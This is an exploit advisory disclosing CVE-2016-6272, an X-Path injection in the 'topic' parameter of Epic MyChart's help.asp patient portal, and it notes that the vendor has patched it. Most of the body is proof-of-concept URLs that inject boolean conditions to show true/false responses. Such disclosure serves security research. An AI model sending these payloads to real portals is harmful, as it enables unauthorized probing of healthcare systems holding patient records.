EPIC MyChart - X-Path Injection

# Exploit Title: Epic Systems Corporation MyChart X-Path Injection
# Google Dork: MyChart® licensed from Epic Systems Corporation
# Date: 8/19/16
# Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/)
# Vendor Homepage: https://www.epic.com/software
# Software Link: N/A
# Version: N/A
# Tested on: Windows/Unix
# CVE : CVE-2016-6272

Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction."

The MyChart software contains an X-Path injection due to the lack of sanitization for the GE parameter "topic". A remote attacker can access contents of an XML document containing static display strings, such as field labels, via the topic parameter to help.asp.

EPIC was quick to respond to contact and patch the vulnerability in MyChart.

Below are two proof of concepts:

Proof of concept 1:

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=7900 AND ("LygB"="LygB ===> TRUE (this will show the help topic for enabling cookies)

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=8000 AND ("LygB"="LygB ===> FALSE (will not show)

Proof of concept 2 (operations):

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*8 OR "000OxPf"="000OxPf ===> TRUE

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 OR "000OxPf"="000OxPf ===> TRUE (because of the OR)

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 AND"000OxPf"="000OxPf ===> FALSE